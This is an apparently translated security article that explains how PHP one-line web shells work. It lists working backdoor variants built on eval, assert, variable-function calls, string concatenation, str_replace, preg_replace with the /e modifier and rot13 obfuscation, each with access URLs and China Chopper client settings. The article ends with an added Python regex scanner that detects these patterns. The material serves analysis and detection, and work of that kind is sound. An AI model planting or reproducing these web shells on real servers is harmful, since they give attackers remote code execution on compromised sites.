The PHP one-line backdoors we chased in those years: an analysis of how they work
I. eval
eval usage:
The eval() function evaluates a string as PHP code.
The string must be valid PHP code and must end with a semicolon.
If the code string does not call return, NULL is returned. If the code contains a parse error, eval() returns false.
<?php eval($_POST[password]); ?>
II. assert
assert usage:
The assert function is used in PHP to check whether an expression is true. It returns true or false.
It is similar to eval. However, eval($code_str) only executes PHP code, whereas assert can be controlled in more detail.
assert_options() can be used to restrict and control assert().
Default values:
ASSERT_ACTIVE = 1 // assert() switch
ASSERT_WARNING = 1 // whether to issue a PHP warning for each failed assertion
ASSERT_BAIL = 0 // whether to terminate execution on failed assertions
ASSERT_QUIET_EVAL = 0 // whether to disable error_reporting during assertion expression evaluation
ASSERT_CALLBACK = (NULL) // user function to call on failed assertions
In the same way, the backdoor can be rewritten with assert to get past regular-expression matching:
<?php assert($_POST[password]); ?>
3. Modified one-liners:
<?php $_GET['xxoo']($_POST['cmd']); ?>
The client is the "kitchen knife" (China Chopper), the password is cmd, and the URL is test.php?xxoo=assert
<?php $_POST['xxoo']($_POST['cmd']); ?>
This one works when the POST request is sent directly.
<?php
$a = "a"."s"."s"."e"."r"."t";
$a($_POST["cmd"]);
?>
<?php ($_=@$_GET[password]).@$_($_POST[xxoo])?>
Usage: http://localhost/password.php?password=assert
The principle is that GET passes in assert as the parameter, which then forms @assert($_POST[xxoo]).
<?php $_POST['Password']($_POST['cmd']); ?>
Submit the POST content so that it forms assert and eval.
4. Replace with str_replace
$a = str_replace("x", "", "axsxxsxexrxxt");
The final form is $a = assert.
5.
<?php
@preg_replace("/[email]/e", $_POST['h'], "error");
?>
A word about this backdoor: it uses the e modifier. The pattern only needs to match the e in the final "error" string to get the content of $_POST['h'] evaluated.
Then we only need to give the kitchen knife <O>h=@assert($_POST[c]);</O> to execute the h parameter.
6.
<?php
$_ = "";
$_[+""] = '';
$_ = "$_" . "";
$_ = ($_[+""] | "") . ($_[+""] | "") . ($_[+""] ^ "");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['_']); ?>
Usage: http://localhost/2.php?_=assert&__=eval($_POST['xxoo'])
Password: xxoo
To analyze how it works, you only need to print $_.
7.
<?php
($b4dboy = $_POST['1']) & @preg_replace('/ad/e', '@'.str_rot13('riny').'($b4dboy)', 'add');
?>
'@'.str_rot13('riny') is equivalent to @eval, and the rest follows from that.
In fact, most of these work on the same principle: after parsing, the underlying statement is still eval or assert.
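Because every variant above still resolves to eval or assert acting on request data, a scanner can look for that underlying shape rather than for one literal string. The Python heuristic below is an added example, not code from the original article; the rule names, the scan and resolved_names helpers and the sample strings are constructed for illustration.

```python
import codecs
import re

SG = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"   # request superglobals
LIT = r"""(?:'[^']*'|"[^"]*")"""            # one quoted PHP string literal
RULES = {
    # eval()/assert() called directly on request data
    "direct-exec": re.compile(r"\b(?:eval|assert)\s*\(\s*@?\s*" + SG, re.I),
    # request value used as the function name: $_GET['f']($_POST['c'])
    "request-callee": re.compile(SG + r"\s*\[[^\]]*\]\s*\(", re.I),
    # variable called as a function on request data: $a($_POST['c'])
    "variable-callee": re.compile(r"\$\w+\s*\(\s*@?\s*" + SG, re.I),
    # preg_replace() whose pattern literal ends in modifiers that include e
    "preg-replace-e": re.compile(r"preg_replace\s*\(\s*(['\"])(.)(?:(?!\1).)*\2[a-z]*e[a-z]*\1", re.I),
}
CONCAT = re.compile(rf"(?:{LIT}\s*\.\s*)+{LIT}")
STR_REPLACE = re.compile(rf"str_replace\s*\(\s*({LIT})\s*,\s*({LIT})\s*,\s*({LIT})\s*\)", re.I)
ROT13 = re.compile(rf"str_rot13\s*\(\s*({LIT})\s*\)", re.I)
HIDDEN = {"eval", "assert"}

def resolved_names(src):
    """Statically evaluate literal-only string tricks; return what they spell."""
    out = ["".join(s[1:-1] for s in re.findall(LIT, m.group(0)))
           for m in CONCAT.finditer(src)]
    for m in STR_REPLACE.finditer(src):
        needle, repl, hay = (g[1:-1] for g in m.groups())
        out.append(hay.replace(needle, repl))
    out += [codecs.decode(m.group(1)[1:-1], "rot13") for m in ROT13.finditer(src)]
    return out

def scan(src):
    """Return the sorted names of the rules that fire on one PHP source string."""
    hits = {name for name, rx in RULES.items() if rx.search(src)}
    if any(n.strip().lower() in HIDDEN for n in resolved_names(src)):
        hits.add("hidden-exec-name")
    return sorted(hits)

# Constructed samples modelled on the variants in the article, plus one benign file.
SAMPLES = {
    "plain": "<?php eval($_POST[password]); ?>",
    "callee": "<?php $_GET['xxoo']($_POST['cmd']); ?>",
    "concat": '<?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["cmd"]); ?>',
    "replace": '<?php $a = str_replace("x", "", "axsxxsxexrxxt"); ?>',
    "rot13": "<?php @preg_replace('/ad/e', '@'.str_rot13('riny').'($b)', 'add'); ?>",
    "benign": "<?php echo htmlspecialchars($_POST['name']); ?>",
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, scan(src))
```

Pattern rules like these do not see names assembled at run time from character arithmetic, as in variant 6, so hits are triage input rather than a verdict.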